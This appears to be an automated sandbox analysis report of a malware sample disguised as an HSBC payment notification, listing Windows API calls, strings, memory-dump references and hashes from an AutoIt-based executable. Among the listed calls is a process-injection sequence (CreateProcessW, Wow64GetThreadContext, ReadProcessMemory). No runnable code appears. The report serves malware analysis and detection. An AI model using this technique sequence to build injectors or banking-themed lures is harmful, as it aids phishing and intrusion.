• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00403074
• RegisterClassExW.USER32(00000030), ref: 0040309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
• InitCommonControlsEx.COMCTL32(?), ref: 004030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
• LoadIconW.USER32(000000A9), ref: 004030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915

Control-flow Graph

APIs
  • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
  • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
• RegCloseKey.ADVAPI32(?), ref: 0043E947
• _wcscat.LIBCMT ref: 0043E9A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
• KillTimer.USER32(?,00000001), ref: 004036FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
• CreatePopupMenu.USER32 ref: 0040373E
• PostQuitMessage.USER32(00000000), ref: 0040374D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated$%I
• API String ID: 129472671-1195164674
• Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
• Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
• Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
• Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00403A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
• LoadIconW.USER32(00000063), ref: 00403A76
• LoadIconW.USER32(000000A4), ref: 00403A88
• LoadIconW.USER32(000000A2), ref: 00403A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
• RegisterClassExW.USER32(?), ref: 00403B16
  • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
  • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
  • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
  • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
  • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
  • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
  • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
• Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
• Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
• Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
• API String ID: 1825951767-3937808951
• Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
• Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
• Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
• Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
APIs
• GetWindowsDirectoryW.KERNEL32(?,02F15A6E), ref: 02F37925
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: DirectoryWindows
• String ID:
• API String ID: 3619848164-0
• Opcode ID: bc0bc8ce5fc02488307495c21cdf45268ec2e15928b69f0da7035c3c16c87435
• Instruction ID: d5c5b93e3a65cd9d9f7f57cc2c50bbd50d1c1a53f96c79eac7e0e4999a121807
• Opcode Fuzzy Hash: bc0bc8ce5fc02488307495c21cdf45268ec2e15928b69f0da7035c3c16c87435
• Instruction Fuzzy Hash: 29A108E1E4D3859FEB3776248C15B75FBB46F026E4F480686E782CA1E2E3245944C7A2
Memory Dump Source
• Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c997beb54c4b9ffab152914948a76879672b44da466c15feb34d8cd0bb1b24e1
• Instruction ID: 58a7e00f590822e5e380155bd8063b14cd8581f4b6089d12758d7230793acbc4
• Opcode Fuzzy Hash: c997beb54c4b9ffab152914948a76879672b44da466c15feb34d8cd0bb1b24e1
• Instruction Fuzzy Hash: 31920672D0C3808FE725CF28C85476ABBE0AF96398FC9465EEB8587692D3759408C753

Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                      • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: <WL$\TL$%I$SL
• API String ID: 1986988660-4199584472
• Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
• Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
• Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
• Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
• CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00AC1999
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AC1BBF
Memory Dump Source
• Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
• Instruction ID: 554b747f085736ab59102edfad27f53c99ea8053062a5b9e025c76ba13e70e9b
• Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
• Instruction Fuzzy Hash: C6A11370E01209EBDB14CFA4C998FEEBBB5BF49304F208599E101BB281D7759A81CF90

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed; single block 4039d5-403a45: CreateWindowExW * 2, ShowWindow * 2)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
• ShowWindow.USER32(00000000,?,?), ref: 00403A38
• ShowWindow.USER32(00000000,?,?), ref: 00403A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
• Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
• Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
• Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
  • Part of subcall function 00AC1588: Sleep.KERNEL32(000001F4), ref: 00AC1599
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00AC17BF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: 8YOXUBURCFQGL6YOHWITVI
• API String ID: 2694422964-418923717
• Opcode ID: ae83f053fb2bb7ab371fd79092a7366ac8eeac9c1cd4f81240a8765fc5b3b27e
• Instruction ID: 7dc99bdae3b8874bb46c3afdaeb789809ee5ac2b3f4e41abc472505a8afe7d42
• Opcode Fuzzy Hash: ae83f053fb2bb7ab371fd79092a7366ac8eeac9c1cd4f81240a8765fc5b3b27e
• Instruction Fuzzy Hash: 3851A130E0428DDAEF11DBE4C809BEEBBB9AF15304F10419DE2487B2C1D6BA4B44CB65

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• _memset.LIBCMT ref: 004040FC
• _wcscpy.LIBCMT ref: 00404150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
• Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
• Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
• Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
• Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
APIs
• CreateProcessW.KERNEL32(?,00000000), ref: 00AC0DB5
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00AC0DD9
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AC0DFB
Memory Dump Source
• Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
• Instruction ID: 84d855292bcbbb40a15c9e3ca2ebf0e3062da895a41eec35b4075138f141485a
• Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
• Instruction Fuzzy Hash: C362EA30A14258DBEB24CFA4C851BDEB376EF58300F1091ADD10DEB295E77A9E81CB59
APIs
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
• Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
APIs
  • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
• _free.LIBCMT ref: 0043E263
• _free.LIBCMT ref: 0043E2AA
  • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
• RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
Strings
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
  • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
• _free.LIBCMT ref: 004696A2
• _free.LIBCMT ref: 004696A9
• _free.LIBCMT ref: 00469714
  • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
  • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
• _free.LIBCMT ref: 0046971C
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
APIs
Strings
Similarity
• API ID: _memmove
• String ID: AU3!P/I$EA06
• API String ID: 4104443479-1914660620
APIs
• _memset.LIBCMT ref: 0043EA39
• GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
  • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
  • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
Strings
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• _wcscat.LIBCMT ref: 00444CB7
Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                    • String ID: SL
                                                                                                                                                    • API String ID: 257928180-181245872
                                                                                                                                                    • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
